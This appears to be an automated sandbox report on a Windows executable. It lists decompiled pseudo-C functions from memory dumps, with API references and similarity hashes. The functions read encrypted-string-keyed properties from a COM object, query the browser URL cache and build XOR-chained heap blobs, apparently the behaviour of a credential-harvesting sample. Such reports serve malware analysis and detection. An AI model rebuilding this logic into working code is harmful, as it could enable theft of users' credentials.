    							 *(_t247 + 0x4a) = _t125;
    							_push(4);
    							_push(_t247 + 0x4c);
    							_push(_t225);
    							 *((short*)(_t247 + 0x54)) = 0;
    							if( *_t232() != 4) {
    								L72:
    								_t233 = 0;
    							} else {
    								_t166 =  *(_t247 + 0x28);
    								_push(0);
    								_push(_t166);
    								_push( *(_t247 + 0x1c));
    								_push(_t225);
    								if( *_t232() != _t166) {
    									goto L72;
    								} else {
    									_t233 = 1;
    								}
    							}
    						} else {
    							_t233 = _t125 + 2;
    						}
    						_t128 =  *(_t247 + 0x1c);
    						if(_t128 != 0) {
    							HeapFree( *0x42e6d4, 0, _t128);
    						}
    						return _t233;
    					}
    				}
    			}


    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 0f5ed995b6b723d83656e06134eea33f82e3a7ccc9f9d90712bdfa26851b22e8
    • Instruction ID: 66484bf6d23b6d4cf3c54adffe178f92e2968ca64fefd948f0860bbd454ff9da
    • Opcode Fuzzy Hash: 0f5ed995b6b723d83656e06134eea33f82e3a7ccc9f9d90712bdfa26851b22e8
    • Instruction Fuzzy Hash: 5FC17C706087129BC724DF25C880A3BB7E5EF98704F54493EF4C6AB291E63CD945CB6A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E00422D30(WCHAR* __ecx, signed char* __edx) {
    				intOrPtr _v4;
    				intOrPtr _v68;
    				short _v520;
    				char _v528;
    				char _v612;
    				char _v632;
    				char _v636;
    				char _v648;
    				signed int _v656;
    				char _v660;
    				char _v668;
    				char _v672;
    				char _v676;
    				signed int _v680;
    				char _v684;
    				char _v688;
    				intOrPtr* _v692;
    				char _v696;
    				signed int _v700;
    				intOrPtr* _v704;
    				signed int _v708;
    				signed int _v716;
    				char _v720;
    				signed int _v724;
    				signed int _v728;
    				signed int _v732;
    				signed int _v736;
    				void* __ebx;
    				void* __esi;
    				WCHAR* _t68;
    				signed int _t70;
    				signed int _t74;
    				intOrPtr* _t77;
    				signed int _t78;
    				intOrPtr* _t79;
    				signed int _t82;
    				signed int _t83;
    				intOrPtr* _t85;
    				signed int _t86;
    				intOrPtr* _t88;
    				signed int _t90;
    				intOrPtr* _t92;
    				signed int _t94;
    				intOrPtr* _t96;
    				signed int _t98;
    				signed int _t99;
    				signed int _t105;
    				signed int _t108;
    				signed int _t112;
    				signed int _t127;
    				signed int _t128;
    				intOrPtr _t129;
    				WCHAR* _t130;
    				signed int _t149;
    				void* _t150;
    				signed short* _t156;
    				signed int _t168;
    				signed int _t169;
    				intOrPtr* _t170;
    				void* _t171;
    				signed int _t173;
    				signed char* _t174;
    				signed short* _t175;
    				signed int _t176;
    				char* _t177;
    				char* _t178;
    				char* _t179;
    				char* _t180;
    				intOrPtr _t183;
    				signed int _t184;
    
    				_t130 = __ecx;
    				_t174 = __edx;
    				_t68 = __edx + 0x2c;
    				if(_t68 != 0) {
    					L1:
    					_t168 =  *_t68 & 0x0000ffff;
    					if(_t168 == 0x5c || _t168 == 0x2f) {
    						_t68 =  &(_t68[1]);
    						goto L1;
    					}
    				}
    				_t70 = PathCombineW( &_v520, _t130, _t68);
    				__eflags = _t70;
    				if(_t70 == 0) {
    					L61:
    					return 1;
    				} else {
    					__eflags =  *_t174 & 0x00000010;
    					if(( *_t174 & 0x00000010) == 0) {
    						_push( &_v528);
    						_t127 = E00419940();
    						_v656 = _t127;
    						__eflags = _t127;
    						if(_t127 != 0) {
    							_t74 =  *((intOrPtr*)( *((intOrPtr*)( *_t127 + 0xb4))))(_t127,  &_v676);
    							__eflags = _t74;
    							if(_t74 == 0) {
    								_t77 = _v684;
    								_t78 =  *((intOrPtr*)( *((intOrPtr*)( *_t77 + 0x1c))))(_t77,  &_v672);
    								__eflags = _t78;
    								if(_t78 == 0) {
    									_t175 =  &_v612;
    									E00424100(0x9e, _t175);
    									_t156 = _t175;
    									_t176 = _v680;
    									__eflags = _t176;
    									if(_t176 != 0) {
    										_t82 = 0;
    										__eflags =  *_t176;
    										if( *_t176 == 0) {
    											L19:
    											_t83 = _t82 + 0xfffffff4;
    											__eflags = _t83;
    											if(_t83 == 0) {
    												goto L21;
    											} else {
    												goto L20;
    											}
    										} else {
    											do {
    												_t82 = _t82 + 1;
    												__eflags =  *((short*)(_t176 + _t82 * 2));
    											} while ( *((short*)(_t176 + _t82 * 2)) != 0);
    											__eflags = _t82 - 0xc;
    											if(_t82 != 0xc) {
    												goto L19;
    											} else {
    												_t150 = 0;
    												_t173 = _t176 -  &_v612;
    												__eflags = _t173;
    												while(1) {
    													_t83 = ( *(_t156 + _t173) & 0x0000ffff) - ( *_t156 & 0x0000ffff);
    													__eflags = _t83;
    													if(_t83 != 0) {
    														break;
    													}
    													_t150 = _t150 + 1;
    													_t156 =  &(_t156[1]);
    													__eflags = _t150 - 0xc;
    													if(_t150 < 0xc) {
    														continue;
    													} else {
    														L21:
    														_t177 =  &_v636;
    														E00424100(0x9f, _t177);
    														_t85 = _v692;
    														_t86 =  *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0x94))))(_t85, _t177,  &_v656);
    														__eflags = _t86;
    														if(_t86 != 0) {
    															_v700 = 0;
    															_t169 = _v700;
    														} else {
    															_t169 = E004199F0( &_v668);
    															_v700 = _t169;
    														}
    														_t178 =  &_v660;
    														E00424100(0xa0, _t178);
    														_t88 = _v704;
    														_t90 =  *((intOrPtr*)( *((intOrPtr*)( *_t88 + 0x94))))(_t88, _t178,  &_v676);
    														__eflags = _t90;
    														if(_t90 != 0) {
    															_v708 = 0;
    														} else {
    															_v708 = E004199F0( &_v688);
    														}
    														_t179 =  &_v648;
    														E00424100(0xa1, _t179);
    														_t92 = _v716;
    														_t94 =  *((intOrPtr*)( *((intOrPtr*)( *_t92 + 0x94))))(_t92, _t179,  &_v684);
    														__eflags = _t94;
    														if(_t94 != 0) {
    															_t184 = 0;
    															__eflags = 0;
    														} else {
    															_t184 = E004199F0( &_v696);
    														}
    														_t180 =  &_v648;
    														E00424100(0xa2, _t180);
    														_t96 = _v728;
    														_t164 = _t180;
    														_t98 =  *((intOrPtr*)( *((intOrPtr*)( *_t96 + 0x94))))(_t96, _t180,  &_v688);
    														__eflags = _t98;
    														if(_t98 != 0) {
    															_v724 = 0;
    															_t128 = _v724;
    														} else {
    															_t128 = E004199F0( &_v700);
    															_v724 = _t128;
    														}
    														__eflags = _t169;
    														if(_t169 == 0) {
    															_t170 = __imp__#6;
    														} else {
    															__eflags =  *_t169;
    															if( *_t169 != 0) {
    																__eflags = _t184;
    																if(_t184 != 0) {
    																	__eflags =  *_t184;
    																	if( *_t184 != 0) {
    																		__eflags = _t128;
    																		if(_t128 != 0) {
    																			_t105 = E00422A10(_t164, _t128);
    																			__eflags = _t105;
    																			if(_t105 > 0) {
    																				_t165 = _v732;
    																				__eflags = _v732;
    																				if(_v732 == 0) {
    																					L42:
    																					_t171 = 0x15;
    																				} else {
    																					_t171 = E00411140(_t165);
    																					__eflags = _t171 - 1;
    																					if(_t171 < 1) {
    																						goto L42;
    																					} else {
    																						__eflags = _t171 - 0xffff;
    																						if(_t171 > 0xffff) {
    																							goto L42;
    																						}
    																					}
    																				}
    																				_v720 = 0;
    																				E00424100(0x55,  &_v632);
    																				_push(_t171);
    																				_push(_v736);
    																				_push(_t128);
    																				_t108 = E00411DC0(__eflags,  &_v720,  &_v632, _t184);
    																				_t129 = _v720;
    																				__eflags = _t108;
    																				if(_t108 > 0) {
    																					_t183 = _v68;
    																					_t112 = E00410D70(_t183, _t129, _t108);
    																					__eflags = _t112;
    																					if(_t112 != 0) {
    																						_t58 = _t183 + 4;
    																						 *_t58 =  *(_t183 + 4) + 1;
    																						__eflags =  *_t58;
    																					}
    																				}
    																				E004107C0(_t129);
    																				_t128 = _v724;
    																				_t169 = _v736;
    																			}
    																		}
    																	}
    																}
    															}
    															_t170 = __imp__#6;
    															 *_t170(_t169);
    														}
    														_t99 = _v732;
    														__eflags = _t99;
    														if(_t99 != 0) {
    															 *_t170(_t99);
    														}
    														__eflags = _t184;
    														if(_t184 != 0) {
    															 *_t170(_t184);
    														}
    														__eflags = _t128;
    														if(_t128 != 0) {
    															 *_t170(_t128);
    														}
    														_t176 = _v728;
    														_t127 = _v716;
    													}
    													goto L57;
    												}
    												L20:
    												__eflags = _t83;
    												_t149 = 0 | _t83 > 0x00000000;
    												_t22 = _t149 - 1; // -1
    												__eflags = _t149 + _t22;
    												if(_t149 + _t22 != 0) {
    													_t170 = __imp__#6;
    												} else {
    													goto L21;
    												}
    											}
    										}
    										L57:
    										__eflags = _t176;
    										if(_t176 != 0) {
    											 *_t170(_t176);
    										}
    									}
    								}
    								_t79 = _v692;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t79 + 8))))(_t79);
    							}
    							 *((intOrPtr*)( *((intOrPtr*)( *_t127 + 8))))(_t127);
    						}
    						goto L61;
    					} else {
    						E00422CE0( &_v528, _v4);
    						return 1;
    					}
    				}
    			}


    APIs
    • PathCombineW.SHLWAPI(?,?,?), ref: 00422D5F
    • SysFreeString.OLEAUT32(00000000), ref: 00423007
    • SysFreeString.OLEAUT32(00000000), ref: 0042301A
    • SysFreeString.OLEAUT32(00000000), ref: 00423021
    • SysFreeString.OLEAUT32(00000000), ref: 00423028
    • SysFreeString.OLEAUT32(?), ref: 0042303F
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FreeString$CombinePath
    • String ID:
    • API String ID: 16530377-0
    • Opcode ID: dbf2c3aeb27526b962e5394d52e690c3c669cebb66b287d3d29cb1e44e7614d4
    • Instruction ID: b106f82ce96953bf229530fcbc2442ad0e6866fae64c6ee75da8daf3995b36d5
    • Opcode Fuzzy Hash: dbf2c3aeb27526b962e5394d52e690c3c669cebb66b287d3d29cb1e44e7614d4
    • Instruction Fuzzy Hash: 1B91D0713043229FC720DF25E980A6BB3E9AFC8704F50442EF94597355EB78ED468BA6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 99%
    			E00418D30(void** _a4, signed char _a8, intOrPtr _a12) {
    				char _v260;
    				long _v264;
    				void* __esi;
    				void* _t73;
    				long _t75;
    				void* _t78;
    				long _t84;
    				void* _t89;
    				long _t96;
    				void* _t98;
    				intOrPtr* _t100;
    				long _t104;
    				void* _t107;
    				signed int _t108;
    				signed int _t109;
    				void* _t114;
    				signed int _t115;
    				signed int _t116;
    				void* _t118;
    				intOrPtr _t120;
    				intOrPtr _t126;
    				intOrPtr _t129;
    				long* _t130;
    				intOrPtr _t134;
    				intOrPtr _t140;
    				void* _t144;
    				signed int _t145;
    				intOrPtr* _t146;
    				void* _t147;
    				long* _t151;
    				intOrPtr _t153;
    				void* _t154;
    
    				_t118 =  *_a4;
    				_v264 = 0;
    				if((_a8 & 0x00000001) != 0) {
    					while(1) {
    						L2:
    						_t104 = _v264;
    						if(_t104 != 0) {
    							goto L6;
    						}
    						L3:
    						if( *((intOrPtr*)(_t118 + 0x1c)) != _t104 &&  *((intOrPtr*)(_t118 + 0x14)) >= 0x40) {
    							_t151 = _t118 + 0x30;
    							L7:
    							_t129 =  *((intOrPtr*)(_t118 + 0x14));
    							_t107 = _t151 - _t118 + 0x10;
    							if(_t107 <= _t129 && _t151[2] + _t107 <= _t129) {
    								L9:
    								_v264 = _t151;
    								if( *_t151 <= 0) {
    									L2:
    									_t104 = _v264;
    									if(_t104 != 0) {
    										goto L6;
    									}
    									goto L27;
    								} else {
    									L10:
    									_t108 = _t151[1];
    									if((_t108 & 0x000c0000) == 0) {
    										_t109 = _t108 & 0xfff0ffff;
    										_t151[1] = _t109;
    										_t145 = _t109 & 0x70000000;
    										_t130 = _t151;
    										L13:
    										while(1) {
    											do {
    												do {
    													if(_t130 != 0) {
    														_t130 =  &(_t130[4]) + _t130[2];
    														goto L18;
    													} else {
    														if( *((intOrPtr*)(_t118 + 0x1c)) == _t130 ||  *((intOrPtr*)(_t118 + 0x14)) < 0x40) {
    															while(1) {
    																L2:
    																_t104 = _v264;
    																if(_t104 != 0) {
    																	goto L6;
    																}
    																goto L3;
    															}
    														} else {
    															_t130 = _t118 + 0x30;
    															L18:
    															_t140 =  *((intOrPtr*)(_t118 + 0x14));
    															_t114 = _t130 - _t118 + 0x10;
    															if(_t114 > _t140 || _t130[2] + _t114 > _t140) {
    																while(1) {
    																	L2:
    																	_t104 = _v264;
    																	if(_t104 != 0) {
    																		goto L6;
    																	}
    																	goto L3;
    																}
    															} else {
    																goto L20;
    															}
    														}
    													}
    													goto L59;
    													L20:
    												} while ( *_t130 !=  *_t151);
    												_t115 = _t130[1];
    											} while ((_t115 & 0x70000000) != _t145);
    											if((_t115 & 0x000e0000) != 0) {
    												 *_t151 = 0;
    												_t116 = _t130[1];
    												if((_t116 & 0x00080000) == 0) {
    													_t130[1] = _t116 & 0xfff0ffff;
    												} else {
    													 *_t130 = 0;
    												}
    												do {
    													goto L2;
    												} while ( *_t151 <= 0);
    												goto L10;
    											} else {
    												 *_t130 = 0;
    												continue;
    											}
    											goto L59;
    										}
    									} else {
    										 *_t151 = 0;
    										while(1) {
    											L2:
    											_t104 = _v264;
    											if(_t104 != 0) {
    												goto L6;
    											}
    											goto L3;
    										}
    									}
    								}
    								L59:
    							}
    						}
    						goto L27;
    						L6:
    						_t151 =  *((intOrPtr*)(_t104 + 8)) + _t104 + 0x10;
    						goto L7;
    					}
    				}
    				L27:
    				_t73 = HeapAlloc( *0x42e6d4, 8, 0x34);
    				if(_t73 != 0) {
    					 *((intOrPtr*)(_t73 + 0x14)) = 0x30;
    				}
    				_t144 = _t73;
    				if(_t73 == 0) {
    					L58:
    					return 0;
    				} else {
    					_t75 = 0;
    					L32:
    					while(1) {
    						if(_t75 != 0) {
    							_t146 =  *((intOrPtr*)(_t75 + 8)) + _t75 + 0x10;
    							goto L37;
    						} else {
    							if( *((intOrPtr*)(_t118 + 0x1c)) == _t75 ||  *((intOrPtr*)(_t118 + 0x14)) < 0x40) {
    								L47:
    								_push( *((intOrPtr*)(_t144 + 0x14)) - 0x30);
    								_t60 = _t144 + 0x30; // 0x30
    								_t61 = _t144 + 0x20; // 0x20
    								if(E00412470() == 0) {
    									goto L57;
    								} else {
    									_t147 = 0;
    									do {
    										_t84 = GetTickCount();
    										if(_t84 !=  *0x42dd08) {
    											 *0x42dd08 = _t84;
    											E00412320(_t84);
    										}
    										 *((char*)(_t147 + _t144)) = E00412360() - (_t85 & 0xffffff00);
    										_t147 = _t147 + 1;
    									} while (_t147 < 0x14);
    									_t148 = _a12;
    									_t153 =  *((intOrPtr*)(_t144 + 0x14));
    									if(_a12 != 0) {
    										_t89 = 1;
    										if(_t153 > 1) {
    											do {
    												 *(_t89 + _t144) =  *(_t89 + _t144) ^  *(_t89 + _t144 - 1);
    												_t89 = _t89 + 1;
    											} while (_t89 < _t153);
    										}
    										E00412640(E00410820( &_v260, _t148, 0x102), _t144, _t153);
    									}
    									HeapFree( *0x42e6d4, 0, _t118);
    									 *_a4 = _t144;
    									return _t153;
    								}
    							} else {
    								_t146 = _t118 + 0x30;
    								L37:
    								_t120 =  *((intOrPtr*)(_t118 + 0x14));
    								_t78 = _t146 - _t118 + 0x10;
    								if(_t78 > _t120) {
    									goto L47;
    								} else {
    									_t134 =  *((intOrPtr*)(_t146 + 8));
    									if(_t78 + _t134 > _t120) {
    										goto L47;
    									} else {
    										_v264 = _t146;
    										if( *_t146 <= 0) {
    											L31:
    											_t75 = _v264;
    											continue;
    										} else {
    											_t154 = _t134 + 0x10;
    											_t96 =  *((intOrPtr*)(_t144 + 0x14)) + _t154;
    											if(_t96 != 0) {
    												_t98 = HeapReAlloc( *0x42e6d4, 8, _t144, _t96 + 4);
    												if(_t98 == 0) {
    													L57:
    													HeapFree( *0x42e6d4, 0, _t144);
    													goto L58;
    												} else {
    													_t144 = _t98;
    													goto L44;
    												}
    											} else {
    												HeapFree( *0x42e6d4, _t96, _t144);
    												_t144 = 0;
    												L44:
    												_t100 =  *((intOrPtr*)(_t144 + 0x14)) + _t144;
    												 *_t100 =  *_t146;
    												 *((intOrPtr*)(_t100 + 4)) =  *((intOrPtr*)(_t146 + 4));
    												_t126 =  *((intOrPtr*)(_t146 + 8));
    												 *((intOrPtr*)(_t100 + 8)) = _t126;
    												 *((intOrPtr*)(_t100 + 0xc)) =  *((intOrPtr*)(_t146 + 0xc));
    												if(_t126 != 0) {
    													E00410820(_t100 + 0x10, _t146 + 0x10, _t126);
    												}
    												 *((intOrPtr*)(_t144 + 0x1c)) =  *((intOrPtr*)(_t144 + 0x1c)) + 1;
    												 *((intOrPtr*)(_t144 + 0x14)) =  *((intOrPtr*)(_t144 + 0x14)) + _t154;
    												goto L31;
    											}
    										}
    									}
    								}
    							}
    						}
    						goto L59;
    					}
    				}
    				goto L59;
    			}

    0x00418fd3
    0x00418fe2
    0x00418fef
    0x00418ffd
    0x00418ffd
    0x00418ea7
    0x00418ea7
    0x00418eb3
    0x00418eb3
    0x00418eba
    0x00418ebf
    0x00000000
    0x00418ec5
    0x00418ec5
    0x00418ecc
    0x00000000
    0x00418ece
    0x00418ed1
    0x00418ed5
    0x00418e85
    0x00418e85
    0x00000000
    0x00418ed7
    0x00418eda
    0x00418edd
    0x00418edf
    0x00418f02
    0x00418f0a
    0x00419000
    0x00419009
    0x00000000
    0x00418f10
    0x00418f10
    0x00000000
    0x00418f10
    0x00418ee1
    0x00418eea
    0x00418ef0
    0x00418f12
    0x00418f17
    0x00418f19
    0x00418f1e
    0x00418f21
    0x00418f24
    0x00418f2a
    0x00418f2f
    0x00418f3a
    0x00418f3a
    0x00418f3f
    0x00418f42
    0x00000000
    0x00418f42
    0x00418edf
    0x00418ed5
    0x00418ecc
    0x00418ebf
    0x00418e97
    0x00000000
    0x00418e92
    0x00418e90
    0x00000000

    APIs
    • HeapAlloc.KERNEL32(?,00000008,00000034,?,?,?,?), ref: 00418E66
    • HeapFree.KERNEL32(?,?,00000000), ref: 00418EEA
    • HeapReAlloc.KERNEL32(?,00000008,00000000,?), ref: 00418F02
    • GetTickCount.KERNEL32 ref: 00418F70
    • HeapFree.KERNEL32(?,00000000,?), ref: 00418FE2
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Heap$AllocFree$CountTick
    • String ID:
    • API String ID: 3424527383-0
    • Opcode ID: 3451fddb23d1aabb315a81a0871efe6bf8ba384b1e91c66c1e08d66cc59b5b79
    • Instruction ID: d3d9caf029e3aba5c6aa2189252adf4bcf81e4ace62a6341c11dea86db7e6582
    • Opcode Fuzzy Hash: 3451fddb23d1aabb315a81a0871efe6bf8ba384b1e91c66c1e08d66cc59b5b79
    • Instruction Fuzzy Hash: 6581A0712003068BCB28DF25D980BA777A5FF94304F14896EE845CB391DB79E896CB99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040B6F0(intOrPtr* __eax) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				signed int _t56;
    				signed int _t57;
    				intOrPtr* _t58;
    				intOrPtr _t59;
    				intOrPtr _t60;
    				intOrPtr* _t61;
    				intOrPtr _t62;
    				void* _t67;
    				signed int _t68;
    				short* _t86;
    				signed int _t88;
    				signed int _t89;
    				intOrPtr _t90;
    				struct _GOPHER_FIND_DATAA _t93;
    				intOrPtr _t94;
    				intOrPtr* _t102;
    				intOrPtr _t105;
    				intOrPtr* _t110;
    				char* _t112;
    				intOrPtr _t115;
    				intOrPtr _t117;
    				intOrPtr* _t123;
    				void* _t125;
    				void* _t126;
    
    				_t89 = _t88 | 0xffffffff;
    				_t110 = __eax;
    				 *(_t126 + 0x10) = _t89;
    				EnterCriticalSection(0x42d3ec);
    				_t94 =  *_t110;
    				if(_t94 == 0) {
    					L41:
    					LeaveCriticalSection(0x42d3ec);
    					return  *((intOrPtr*)(_t126 + 0xc));
    				}
    				_t115 =  *0x42d408; // 0x0
    				_t56 = 0;
    				if(_t115 == 0) {
    					L40:
    					goto L41;
    				} else {
    					_t123 =  *0x42d404; // 0x0
    					_t102 = _t123;
    					while( *_t102 != _t94) {
    						_t56 = _t56 + 1;
    						_t102 = _t102 + 0x24;
    						if(_t56 < _t115) {
    							continue;
    						} else {
    							L39:
    							goto L40;
    						}
    					}
    					if(_t56 == _t89) {
    						goto L39;
    					}
    					_t57 = _t56 + _t56 * 8;
    					_t125 = _t123 + _t57 * 4;
    					if( *((intOrPtr*)(_t123 + 0x10 + _t57 * 4)) <= 0) {
    						goto L39;
    					}
    					if( *((intOrPtr*)(_t125 + 0x10)) != 1 || ( *( *(_t125 + 0xc)) & 0x00000003) == 0) {
    						_t58 =  *((intOrPtr*)(_t126 + 0x34));
    						if(_t58 != 0) {
    							 *_t58 = 0;
    						}
    						if( *((intOrPtr*)(_t125 + 0x18)) != _t89) {
    							L28:
    							_t59 =  *((intOrPtr*)(_t125 + 0x18));
    							if(_t59 != 0xffffffff &&  *((intOrPtr*)(_t126 + 0x14)) == 0xffffffff) {
    								_t60 = _t59 -  *((intOrPtr*)(_t125 + 0x1c));
    								_t117 = _t60;
    								if(_t60 != 0) {
    									_t90 =  *((intOrPtr*)(_t126 + 0x2c));
    									if(_t90 != 0) {
    										_t62 =  *((intOrPtr*)(_t126 + 0x30));
    									} else {
    										_t62 = E00412520(0x2000, 0x1000);
    									}
    									_t117 =  <  ? _t62 : _t117;
    									if(_t90 != 0) {
    										E00410820(_t90,  *(_t125 + 0x14) +  *((intOrPtr*)(_t125 + 0x1c)), _t117);
    										 *((intOrPtr*)(_t125 + 0x1c)) =  *((intOrPtr*)(_t125 + 0x1c)) + _t117;
    									}
    								}
    								_t61 =  *((intOrPtr*)(_t126 + 0x34));
    								if(_t61 != 0) {
    									 *_t61 = _t117;
    								}
    								 *((intOrPtr*)(_t126 + 0x14)) = 1;
    							}
    							goto L39;
    						} else {
    							LeaveCriticalSection(0x42d3ec);
    							_t67 = E0040B560(_t126 + 0x20, _t126 + 0x18,  *_t110,  *((intOrPtr*)(_t125 + 4)));
    							EnterCriticalSection(0x42d3ec);
    							if(_t67 == 0) {
    								L27:
    								 *((intOrPtr*)(_t126 + 0x18)) = 0;
    								SetLastError(0x2ee4);
    								goto L28;
    							}
    							_t92 =  *_t110;
    							_t68 = E0040A9C0( *_t110);
    							if(_t68 == 0xffffffff) {
    								E004107C0( *(_t126 + 0x10));
    								goto L27;
    							}
    							_t105 =  *0x42d404; // 0x0
    							_t125 = _t105 + (_t68 + _t68 * 8) * 4;
    							_t121 = E004136E0(_t92, _t126 + 0x1c);
    							if(E00425560(_t71, _t126 + 0x1c, _t126 + 0x20,  *(_t125 + 0xc),  *((intOrPtr*)(_t125 + 0x10))) != 0) {
    								_t112 = E00410AA0(_t121, 0,  *((intOrPtr*)(_t126 + 0x1c)));
    								 *(_t126 + 0x24) = _t112;
    								if(_t112 != 0) {
    									 *(_t126 + 0x20) = 0x1000;
    									_t93 = E004107A0(0x1000);
    									if(_t93 != 0) {
    										 *_t93 = 0x50;
    										if(GetUrlCacheEntryInfoW(_t112, _t93, _t126 + 0x20) != 0) {
    											_t86 =  *((intOrPtr*)(_t93 + 8));
    											if(_t86 != 0 &&  *_t86 != 0) {
    												E00417FC0(_t86,  *(_t126 + 0x10),  *((intOrPtr*)(_t126 + 0x18)));
    												_t112 =  *(_t126 + 0x24);
    											}
    										}
    										E004107C0(_t93);
    									}
    									E004107C0(_t112);
    								}
    							}
    							E004107C0(_t121);
    							 *(_t125 + 0x14) =  *(_t126 + 0x10);
    							 *((intOrPtr*)(_t125 + 0x18)) =  *((intOrPtr*)(_t126 + 0x18));
    							goto L28;
    						}
    					} else {
    						 *_t110 =  *((intOrPtr*)(_t125 + 0x20));
    						goto L39;
    					}
    				}
    			}

    APIs
    • EnterCriticalSection.KERNEL32(0042D3EC), ref: 0040B703
    • LeaveCriticalSection.KERNEL32(0042D3EC), ref: 0040B792
    • EnterCriticalSection.KERNEL32(0042D3EC), ref: 0040B7B0
    • GetUrlCacheEntryInfoW.WININET(00000000,00000000,?), ref: 0040B83A
      • Part of subcall function 004107C0: HeapFree.KERNEL32(?,00000000,00000000,004078C3,00000000), ref: 004107CD
    • SetLastError.KERNEL32 ref: 0040B8A1
    • LeaveCriticalSection.KERNEL32(0042D3EC), ref: 0040B90D
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterLeave$CacheEntryErrorFreeHeapInfoLast
    • String ID:
    • API String ID: 1663815765-0
    • Opcode ID: 3809e2232a6971a91debed89d44fdee282fdac2b39fe0b3df2e66cd5e8ed963c
    • Instruction ID: 8d6b302f2cf739b2c0219e374bd85d2cd37e0efa3a55e7f05df0cb438fbd279c
    • Opcode Fuzzy Hash: 3809e2232a6971a91debed89d44fdee282fdac2b39fe0b3df2e66cd5e8ed963c
    • Instruction Fuzzy Hash: 99518C716003069BCB10EF25C880AAB73A8EF84754F14462EF855A73E1D778ED45CBDA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00423DA0(void* _a4) {
    				char _v337;
    				char _v804;
    				intOrPtr _v812;
    				long _v816;
    				void* _v836;
    				intOrPtr _v840;
    				void* _v844;
    				intOrPtr _v848;
    				char _v852;
    				long _v856;
    				void* _v864;
    				char _v865;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t48;
    				void* _t61;
    				void* _t64;
    				void* _t71;
    				char _t76;
    				void* _t79;
    				void* _t83;
    				void* _t96;
    				void* _t97;
    				void* _t101;
    				void* _t103;
    				void* _t105;
    
    				_t101 = _a4;
    				_v865 = 0;
    				if(_t101 == 0) {
    					_t101 =  &_v337;
    				}
    				E0041D150( &_v804);
    				E00410870( &_v852,  &_v852, 0, 0x30);
    				_t48 =  *0x42eb6c;
    				if(_t48 == 0) {
    					_t48 = E00413580();
    					 *0x42eb6c = _t48;
    				}
    				_v840 = _t48;
    				_v852 = 0x501;
    				_v848 = 0x1388;
    				_v816 = 0;
    				_v844 =  *0x42edbc;
    				_v836 = _t101;
    				_v812 = 0x12d000;
    				if(E004133B0( &_v852,  &_v864) == 0) {
    					_t76 = _v865;
    					goto L12;
    				} else {
    					if(E00423CB0( &_v804,  &_v864, 0 | _a4 != 0x00000000) != 0) {
    						_v865 = 1;
    					}
    					_t71 = _v864;
    					if(_t71 != 0) {
    						HeapFree( *0x42e6d4, 0, _t71);
    					}
    					_t76 = _v865;
    					if(_t76 == 0) {
    						L12:
    						if(_a4 != 0) {
    							goto L10;
    						} else {
    							_t103 = E00423A90();
    							if(_t103 == 0) {
    								goto L10;
    							} else {
    								_v856 = 0;
    								_t96 = E00418BD0(0x4e24, 0x10000000, _t103);
    								if(_t96 == 0) {
    									_t79 = _v856;
    									goto L18;
    								} else {
    									_t79 = E00418C20(_t96);
    									if(_t79 == 0) {
    										L18:
    										_t97 = _v856;
    									} else {
    										_t97 =  *(_t96 + 0xc);
    									}
    								}
    								HeapFree( *0x42e6d4, 0, _t103);
    								if(_t79 != 0) {
    									if(_t97 >= 2 &&  *((char*)(_t79 + _t97 - 1)) == 0 &&  *((char*)(_t79 + _t97 - 2)) == 0) {
    										_t105 = _t79;
    										if(WaitForSingleObject( *0x42edbc, 0x2710) == 0x102) {
    											while(1) {
    												L24:
    												_v836 = _t105;
    												if(E004133B0( &_v852,  &_v864) != 0) {
    													if(E00423CB0( &_v804,  &_v864, 0) != 0) {
    														_v865 = 1;
    													}
    													_t64 = _v864;
    													if(_t64 != 0) {
    														HeapFree( *0x42e6d4, 0, _t64);
    													}
    												}
    												if(_v865 != 0) {
    													goto L36;
    												}
    												_t83 = 0;
    												_t61 = _t105 + 1;
    												L31:
    												while(1) {
    													if( *((char*)(_t61 - 1)) != 0) {
    														L34:
    														_t61 = _t61 + 1;
    														continue;
    													}
    													if( *_t61 != 0) {
    														_t83 = _t83 + 1;
    														if(_t83 == 1) {
    															_t105 = _t61;
    															if(WaitForSingleObject( *0x42edbc, 0x2710) == 0x102) {
    																goto L24;
    															}
    														} else {
    															goto L34;
    														}
    													}
    													goto L36;
    												}
    											}
    										}
    									}
    									L36:
    									HeapFree( *0x42e6d4, 0, _t79);
    								}
    								return _v865;
    							}
    						}
    					} else {
    						L10:
    						return _t76;
    					}
    				}
    			}

    APIs
    • HeapFree.KERNEL32(?,00000000,?,?,?,00000000), ref: 00423E5E
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 00423EC6
    • WaitForSingleObject.KERNEL32(?,00002710), ref: 00423F07
